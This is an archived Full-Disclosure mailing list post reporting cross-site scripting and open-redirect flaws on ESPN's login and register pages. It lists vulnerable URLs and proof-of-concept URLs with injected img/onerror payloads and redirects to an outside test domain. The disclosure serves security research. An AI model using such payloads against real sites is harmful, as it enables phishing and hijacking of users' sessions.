lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Tue, 9 Dec 2014 22:02:15 +0800
From: Jing Wang <justqdjing@...il.com>
To: fulldisclosure@...lists.org
Subject: [FD] ESPN espn.go.com Login & Register Page XSS and Dest Redirect
 Privilege Escalation Security Vulnerabilities

*ESPN espn.go.com <http://espn.go.com/> Login & Register Page XSS and Dest
Redirect Privilege Escalation Security Vulnerabilities*





*Domain:*
http://espn.go.com/


*"*As of August 2013, ESPN is available to approximately 97,736,000 pay
television households (85.58% of households with at least one television
set) in the United States.[2]
<http://en.wikipedia.org/wiki/ESPN#cite_note-2> In addition to the flagship
channel and its seven related channels in the United States, ESPN
broadcasts in more than 200 countries,[3]
<http://en.wikipedia.org/wiki/ESPN#cite_note-ESPN_Inc-3> operating regional
channels in Australia <http://en.wikipedia.org/wiki/Australia>, Brasil
<http://en.wikipedia.org/wiki/Brasil>, Latin America
<http://en.wikipedia.org/wiki/Latin_America> and the United Kingdom
<http://en.wikipedia.org/wiki/United_Kingdom>, and owning a 20% interest in The
Sports Network <http://en.wikipedia.org/wiki/The_Sports_Network> (TSN) as
well as its five sister networks and NHL Network
<http://en.wikipedia.org/wiki/NHL_Network_%28Canada%29> in Canada
<http://en.wikipedia.org/wiki/Canada>." (Wikipedia)






*Vulnerability description:*

Espn.go.com <http://espn.go.com/> has a security problem. It is vulnerable
to XSS (Cross Site Scripting) and Dest Redirect Privilege Escalation (Open
Redirect) attacks.


Those vulnerabilities are very dangerous. Since they happen at ESPN's
"login" & "register" pages that are credible. Attackers can abuse those
links to mislead ESPN's users. The success rate of attacks may be high.

During the tests, besides the links given above, large number of ESPN's
links are vulnerable to those attacks.


The vulnerability occurs at "espn.go.com"'s "login?" & "register" pages
with "redirect" parameter, i.e.
http://streak.espn.go.com/en/login?redirect=
https://r.espn.go.com/members/login?appRedirect=http%3A%2F%2Fr.espn.go.com
http://games.espn.go.com/world-cup-bracket-predictor/2014/es/login?redirect=
https://register.go.com/go/sendMemberNames?regFormId=espn&appRedirect=http://register.go.com/


Tests were performed on Firefox (33.0) in Ubuntu (14.04) and IE (8.0. 7601)
in Windows 8.






*(1) XSS Vulnerability*

*Vulnerable URLs:*
http://streak.espn.go.com/en/login?redirect=http%3A%2F%2Fstreak.espn.go.com%2Fen%2FcreateOrUpdateEntrylive%3Fgooglematchup%3Dm32620o35459
http://games.espn.go.com/world-cup-bracket-predictor/2014/es/login?redirect=http%3A%2F%2Fgames.espn.go.com%2Fworld-cup-bracket-linkedin-predictor%2Fvk%2F2014%2Fes%2Fgame%3Famazon%3Dcreate
https://r.espn.go.com/members/login?appRedirect=http%3A%2F%2Fr.espn.go.com%2Fgame%3Famazon%3Dcreate%2Fmembers%2FmodifyNewsletters%3FpageNamepaypal%3DESPNNewsletterPage&language=en&affiliateName=espn&regFormId=reddit
https://register.go.com/go/sendMemberNames?aff_code=go&appRedirect=http://register.go.com/disney/ebay/GuestServices/YourYahooAccount/login


*POC:*
http://streak.espn.go.com/en/login?redirect=http%3A%2F%2Fstreak.espn.go.com%2Fen%2Fyandex%2FcreateOrUpdateEntrylive%3Fgooglematchup%3Dm32620o35459"><img
src=x onerror=prompt('justqdjing')>
https://r.espn.go.com/members/login?appRedirect=http%3A%2F%2Fr.espn.go.com%2Fgame%3Famazon%3Dcreate%2Fmembers%2FmodifyNewsletters%3FpageName%3DESPNNewsletterPage&language=en&affiliateName=espn&regFormId=espn"><img
src=x onerror=prompt('justqdjing')>
http://games.espn.go.com/nfl-gridiron-challenge/2014/en/login?redirect=http%3A%2F%2Fgames.espn.go.com%2Fnfl-gridiron-challenge%2Febay2014%2Ffacebookesgame%3Fstep%3Dcreate"><img
src=x onerror=prompt('justqdjing')>
https://register.go.com/go/sendMemberNames?aff_code=go&appRedirect=http://register.go.com/disney/ebay/GuestServices/YourAccount/login"><img
src=x onerror=prompt('justqdjing')>




*Poc Video:*
https://www.youtube.com/watch?v=gGEZO8wbTBU&feature=youtu.be

*Blog Detail:*
http://securityrelated.blogspot.com/2014/12/espn-espngocom-login-register-page-xss.html
<http://securityrelated.blogspot.sg/2014/12/espn-espngocom-login-register-page-xss.html>




*(2) Dest Redirect Privilege Escalation Vulnerability*

Use one of webpages for the following tests. The webpage address is "
http://www.diebiyi.com/". Suppose that this webpage is malicious.


*(2.1) Login Page ** Dest Redirect Privilege Escalation Vulnerability*

*Vulnerable URL 1:*
https://r.espn.go.com/members/login?appRedirect=https%3A%2F%2Fwww.facebook.com%2FAndroidOfficial

*POC:*
https://r.espn.go.com/members/login?appRedirect=http%3A%2f%2fdiebiyi.com


*Vulnerable URL 2:*
http://streak.espn.go.com/en/login?redirect=https%3A%2F%2Fwww.facebook.com%2Fpages%2Fwwwgooglecom%2Fyahoo101882723190828
<http://streak.espn.go.com/en/login?redirect=https%3A%2F%2Fwww.facebook.com%2Fpages%2Fwwwgooglecom%2F101882723190828>

*POC:*
http://streak.espn.go.com/en/login?redirect=http%3A%2F%2Fdiebiyi.com



*(2.2) Vulnerabilities Attacked without User Login*

*Vulnerable URL 1:*
http://m.espn.go.com/wireless/mw/util/redirectKeepParams?w=1dpoa&url=https%3A%2F%2Ftwitter.com%2FAdcash%2Flinkedinstatus%2Febay%2Falibaba%2F539770783556698112
<http://m.espn.go.com/wireless/mw/util/redirectKeepParams?w=1dpoa&url=https%3A%2F%2Ftwitter.com%2FAdcash%2Fstatus%2Febay%2Falibaba%2F539770783556698112>

*POC:*
http://m.espn.go.com/wireless/mw/util/redirectKeepParams?w=1dpoa&url=http%3A%2F%2Fdiebiyi.com
?



This vulnerability was used to demonstrate "Covert Redirect" of Facebook,

Poc Video:
https://www.youtube.com/watch?v=HUE8VbbwUms

Blog Detail:
http://www.tetraph.com/blog/covert-redirect/covert-redirect-vulnerability-related-to-oauth-2-0-and-openid/




*Vulnerable URL 2:*
http://w88.m.espn.go.com/b/ss/wdgwespdeportes/5.4/REDIR/065639236847243821390018102438?D=..&url=https%3A%2F%2Ftwitter.com%2Freddit%2Fbing%2Ftmallstatus%2Ftmall541002332331606017
<http://w88.m.espn.go.com/b/ss/wdgwespdeportes/5.4/REDIR/065639236847243821390018102438?D=..&url=https%3A%2F%2Ftwitter.com%2Fbing%2Ftmallstatus%2F541002332331606017>

*POC:*
http://w88.m.espn.go.com/b/ss/wdgwespdeportes/5.4/REDIR/065639236847243821390018102438?D=..&url=http%3A%2F%2Fgoogle.com





*Vulnerable URL 3:*
http://w88.m.espn.go.com/b/ss/wdgespw/5.4/REDIR/088360294087348871389981133993?D=..&url=https%3A%2F%2Ftwitter.com%2FYahoo%2Fhao123%2Fstatus%2Fyandex%2F%2Fru%2F541950359917580289

POC:
http://w88.m.espn.go.com/b/ss/wdgespw/5.4/REDIR/088360294087348871389981133993?D=..&url=http%3A%2F%2Fgoogle.com





*Poc Video:*
https://www.youtube.com/watch?v=lCvBt8Elj9w&feature=youtu.be

*Blog Detail:*
http://securityrelated.blogspot.com/2014/12/espn-espn.html
<http://securityrelated.blogspot.sg/2014/12/espn-espn.html>







*(3) *Those security problems were reported to ESPN in early May. However,
they are still unpatched.







Reported by:
Wang Jing, School of Physical and Mathematical Sciences, Nanyang
Technological University, Singapore.
http://www.tetraph.com/wangjing/






*Blog Details:*
http://securityrelated.blogspot.com/2014/12/espn-espngocom-login-register-page-xss_9.html
<http://securityrelated.blogspot.sg/2014/12/espn-espngocom-login-register-page-xss_9.html>

_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists